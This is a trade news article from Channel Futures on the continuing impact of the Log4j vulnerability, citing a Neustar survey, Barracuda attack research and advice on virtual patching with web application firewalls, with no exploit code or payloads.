https://www.channelfutures.com/wp-content/themes/channelfutures_child/assets/images/logo/footer-new-logo.png
  • Home
  • Technologies
    • Back
    • SDN/SD-WAN
    • Cloud
    • RMM/PSA
    • Security
    • Telephony/UC/Collaboration
    • Cable
    • Mobility & Wireless
    • Fiber/Ethernet
    • Data Centers
    • Backup & Disaster Recovery
    • IoT
    • Desktop
    • Artificial Intelligence
    • Analytics
  • Strategy
    • Back
    • Mergers and Acquisitions
    • Channel Research
    • Business Models
    • Distribution
    • Technology Solutions Brokerages
    • Sales & Marketing
    • Best Practices
    • Vertical Markets
    • Regulation & Compliance
  • MSP 501
    • Back
    • Complete 2023 MSP 501 Rankings
    • 2023 MSP 501 50-1
    • 2023 MSP 501 100-51
    • 2023 MSP 501 150-101
    • 2023 MSP 501 200-151
    • 2023 MSP 501 250-201
    • 2023 MSP 501 300-251
    • 2023 MSP 501 350-301
    • 2023 MSP 501 400-351
    • 2023 MSP 501 450-401
    • 2023 MSP 501 501-451
    • NextGen 101 Rankings
  • Intelligence
    • Back
    • Galleries
    • Podcasts
    • From the Industry
    • Reports/Digital Issues
    • Webinars
    • White Papers
  • Channel Futures TV
  • EMEA
  • Channel Chatter
    • Back
    • People on the Move
    • New/Changing Channel Programs
    • New Products & Services
    • Industry Honors
  • Resources
    • Back
    • Channel Futures 20: Top Tech Providers
    • Advisory Boards
    • Industry Organizations
    • Our Sponsors
    • Advertise
    • 2023 Editorial Calendar
  • Awards
    • Back
    • 2023 MSP 501
    • 2023 NextGen 101
    • Channel Influencers
    • Circle of Excellence
    • DE&I 101
    • Technology Advisor 101 (TA 101)
    • Channel Leaders Lists
  • Events
    • Back
    • 2024 CP Expo Call for Speakers
    • Channel Futures Leadership Summit
    • MSP Summit
    • CP Conference & Expo
    • Channel Partners Europe
    • Channel Partners Event Coverage
    • Webinars
    • Industry Events
  • About Us
  • DE&I
Channel Futures
  • NEWSLETTER
  • Home
  • Technologies
    • Back
    • SDN/SD-WAN
    • Cloud
    • RMM/PSA
    • Security
    • Telephony/UC/Collaboration
    • Cable
    • Mobility & Wireless
    • Fiber/Ethernet
    • Data Centers
    • Backup & Disaster Recovery
    • IoT
    • Desktop
    • Artificial Intelligence
    • Analytics
  • Strategy
    • Back
    • Mergers and Acquisitions
    • Channel Research
    • Business Models
    • Distribution
    • Technology Solutions Brokerages
    • Sales & Marketing
    • Best Practices
    • Vertical Markets
    • Regulation & Compliance
  • MSP 501
    • Back
    • Complete 2023 MSP 501 Rankings
    • 2023 MSP 501 50-1
    • 2023 MSP 501 100-51
    • 2023 MSP 501 150-101
    • 2023 MSP 501 200-151
    • 2023 MSP 501 250-201
    • 2023 MSP 501 300-251
    • 2023 MSP 501 350-301
    • 2023 MSP 501 400-351
    • 2023 MSP 501 450-401
    • 2023 MSP 501 501-451
    • NextGen 101 Rankings
  • Intelligence
    • Back
    • Galleries
    • Podcasts
    • From the Industry
    • Reports/Digital Issues
    • Webinars
    • White Papers
  • Channel Futures TV
  • EMEA
  • Channel Chatter
    • Back
    • People on the Move
    • New/Changing Channel Programs
    • New Products & Services
    • Industry Honors
  • Resources
    • Back
    • Channel Futures 20: Top Tech Providers
    • Advisory Boards
    • Industry Organizations
    • Our Sponsors
    • Advertise
    • 2023 Editorial Calendar
  • Awards
    • Back
    • 2023 MSP 501
    • 2023 NextGen 101
    • Channel Influencers
    • Circle of Excellence
    • DE&I 101
    • Technology Advisor 101 (TA 101)
    • Channel Leaders Lists
  • Events
    • Back
    • 2024 CP Expo Call for Speakers
    • Channel Futures Leadership Summit
    • MSP Summit
    • CP Conference & Expo
    • Channel Partners Europe
    • Channel Partners Event Coverage
    • Webinars
    • Industry Events
  • About Us
  • DE&I
    • Newsletter
  • REGISTER
  • MSPs
  • VARs / SIs
  • Agents
  • Cloud Service Providers
  • Channel Partners Events
 Channel Futures

MSSP Insider


Shutterstock

Log4j vulnerability

Log4j Vulnerability Remains Headache for Cybersecurity Pros, Likely Exploited in Ukraine Attacks

  • Written by Edward Gately
  • March 2, 2022
The risk of having the vulnerability exploited is much higher under the circumstances.

A new Neustar International Security Council (NISC) survey shows the Log4j vulnerability continues to plague security professionals globally. Moreover, threat actors could exploit Log4j in attacks against Ukraine.

Three out of five organizations have fielded Log4j attacks. Log4Shell is a zero-day exploit in the popular Java logging library log4j. It results in remote code execution (RCE) by logging a certain string.

Researchers discovered Log4j vulnerability in early December. Log4J led to an explosion of attacks.

Carlos Morales is senior vice president of solutions at Neustar Security Services.

Neustar's Carlos Morales

Neustar’s Carlos Morales

“In general, there is ample evidence of increased cyber activity towards Ukraine-based companies,” he said. “So it is of great importance for those companies to ensure they are preventing access to any known vulnerabilities like Log4j that could be exploited. The risk of having the vulnerability exploited is much higher under the circumstances.”

Personally Impacted by Log4j Vulnerability

Among the NISC survey findings:

  • Log4j has personally impacted three-quarters of respondents. In addition, one in five said the impact had been significant.
  • Nearly half said Log4j has made them reevaluate software supply chain security practices and purchasing decisions.
  • A substantial majority said regulatory bodies like the Federal Trade Commission (FTC) should take legal action against organizations that fail to patch for Log4j.

For companies that have deployed web application firewall (WAF) technology or contract WAF functions from their cloud security providers, there may be a simple solution for handling zero-day threats like Log4j. That’s virtual patching.

Virtual patching tricks any potential attackers into thinking that applications aren’t vulnerable to a threat, Morales said.

“The WAF terminates the connection with the client, ensures that the client is not performing any malicious actions, and then creates a separate connection to the server, bridging data between the two,” he said. “Since it is terminating the client traffic, the WAF can act on behalf of the origin server and cover up for any vulnerabilities that exist on the server.”

Still At It 2 Months Later

Hackers pounced on Log4Shell vulnerabilities in December, and hackers are still at it two months later, according to new Barracuda research.

Since Dec. 10, Barracuda researchers have analyzed the Log4j software attacks and payloads detected by its systems. The volume of attacks attempting to exploit these vulnerabilities has remained relatively constant with a few dips and spikes over the past two months.

Given the popularity of the software, the exploitability of the vulnerability and the payoff when a compromise happens, Barracuda researchers expect this attack pattern to continue, at least for the short-term.

Among Barracuda research findings:

  • The majority of attacks came from IP addresses in the United States. Half of those IP addresses are associated with Amazon Web Services (AWS), Azure and other data centers.
  • Threat actors are sending attacks from Japan, Germany, Netherlands and Russia.

Tushar Richabadas is Barracuda’s senior product manager of application and cloud security. He said cybercriminals likely have had some success with Log4Shell.

Barracuda's Tushar Richabadas

Barracuda’s Tushar Richabadas

“We’re seeing a lot of scans, and a lot of attacks, but not many high-profile breaches,” he said. “A large portion of the exploit attempts are cryptominers. There were also distributed denial-of-service (DDoS) bots like Mirai and such. We’re slowly hearing about more significant attackers like the … Conti group using this vulnerability. So we’ll likely see bigger breaches happening over time.”

Long Tail for Log4j Attacks

There is probably going to be a long tail for these attacks and scams, Richabadas said. Therefore, patching is going to remain critical for a very long time.

ProxyLogon vulnerabilities were discovered in March of last year. However, Barracuda saw renewed interest from malware groups in November, he said.

“We’ll probably see something similar with Log4Shell as well,” Richabadas said. “A large number of organizations have patched or upgraded their vulnerable installations, and have also added layers of protection against such attacks. This is something that has stopped a large number of these attacks. In terms of stopping the threat actors themselves, the most effective has been the takedowns of the payload servers and callback servers.”

Want to contact the author directly about this story? Have ideas for a follow-up article? Email Edward Gately or connect with him on LinkedIn.
Tags: MSPs MSSP Insider Channel Research Cloud Data Centers EMEA Security

Most Recent


  • 21st century technology vision for Oracle Cloud
    The Gately Report: Cybersecurity Fundamental to Oracle's 21st Century Technology Vision
    Plus, Exabeam's CEO weighs in on Cisco's acquisition of Splunk.
  • Conversational AI
    Kore.ai Hires Nextiva, ThreatProtector Vet to Lead NA TSDs
    The new channel sales leader is building a new TSD partner program.
  • Partners Balance Multicloud Opportunity, Complexity
    Partners Balance Multicloud Opportunity, Complexity
    Partners offering multicloud services and consulting can enable customers to fully exploit the native services of each cloud type while providing the consistency and standardization that development, operations and security teams need.
  • Cisco acquisition of Splunk gets partner reaction
    Partners Hope Splunk Keeps 'Pace of Innovation' in Cisco Acquisition
    All will be well if Cisco integrates Splunk the way it integrated Meraki, a partner told Channel Futures.

Leave a comment Cancel reply

-or-

Log in with your Channel Futures account

Alternatively, post a comment by completing the form below:

Your email address will not be published. Required fields are marked *

Related Content

  • Russia-Ukraine Conflict
    Check Point, Sophos, Trend Micro Among Cybersecurity Providers Responding to Ukraine Crisis
  • Ukraine flag
    The Gately Report: Proofpoint Tracking Ukraine Crisis for Partners, Customers; New Darktrace Division
  • Penetration Testing
    6 Important Penetration Testing Certification Programs in 2022
  • internal defenses
    Adlumin Launches New MSP Partner Program

Upcoming Events

View all

Channel Futures Leadership Summit

October 30, 2023 - November 2, 2023

Channel Partners Conference & Expo

March 11, 2024 - March 14, 2024

Channel Futures Leadership Summit 2024

September 17, 2024 - September 19, 2024

Galleries

View all

2023 MSP 501 Channel Disruptors: These Companies Are Shaking Things Up

September 25, 2023

The Gately Report: Cybersecurity Fundamental to Oracle’s 21st Century Technology Vision

September 25, 2023

Kore.ai Hires Nextiva, ThreatProtector Vet to Lead NA TSDs

September 25, 2023

Industry Perspectives

View all

Partners Balance Multicloud Opportunity, Complexity

September 25, 2023

Why Conversational AI Matters for Your Customers and How It Can Boost Your Revenue

September 15, 2023

The 5 Ds that Lead to Unplanned Business Sales

September 13, 2023

Webinars

View all

MSP 501: Leadership in Cybersecurity

October 19, 2023

DE&I: Find the Balance that Works for You

September 7, 2023

Above and Beyond with the NextGen 101ers

August 30, 2023

White Papers

View all

6 UCaaS Reseller Challenges and How Real World Businesses Solved Them

February 1, 2023

Frost Radar: North American UCaaS Market, 2022

February 1, 2023

The Complete Guide to White-Label UCaaS for Reseller Success

February 1, 2023

Channel Futures TV

View all

Coffee with Craig and James Episode 129: ZLH Enterprises

Coffee with Craig and James Episode 128: Channel Partner Strategies Intelligence Service

August 25, 2023

Coffee with Craig and James Episode 127: Expereo, Movie Night Returns

August 18, 2023

Coffee with Craig and James Episode 126: ARG

July 28, 2023

MSP 501

The industry's largest and most comprehensive partner awards program.

Newsletters and Updates

Sign up for The Channel Report, Channel Futures Update, MSP 501 Newsletter and more.

Live Channel Events

Get the latest information on the next industry-leading Channel Partners event.

Galleries

Educational slide shows and images from live events.

Media Kit And Advertising

Want to reach our audience? Access our media kit.

DISCOVER MORE FROM INFORMA TECH

  • Channel Partners Events
  • Telecoms.com
  • MSP 501
  • Black Hat
  • IoT World Today
  • Omdia

WORKING WITH US

  • Contact
  • About Us
  • Advertise
  • Newsletter

FOLLOW Channel Futures ON SOCIAL

  • Privacy
  • CCPA: “Do Not Sell My Data”
  • Cookie Policy
  • Terms
Copyright © 2023 Informa PLC. Informa PLC is registered in England and Wales with company number 8860726 whose registered and Head office is 5 Howick Place, London, SW1P 1WG.
This website uses cookies, including third party ones, to allow for analysis of how people use our website in order to improve your experience and our services. By continuing to use our website, you agree to the use of such cookies. Click here for more information on our Cookie Policy and Privacy Policy.
X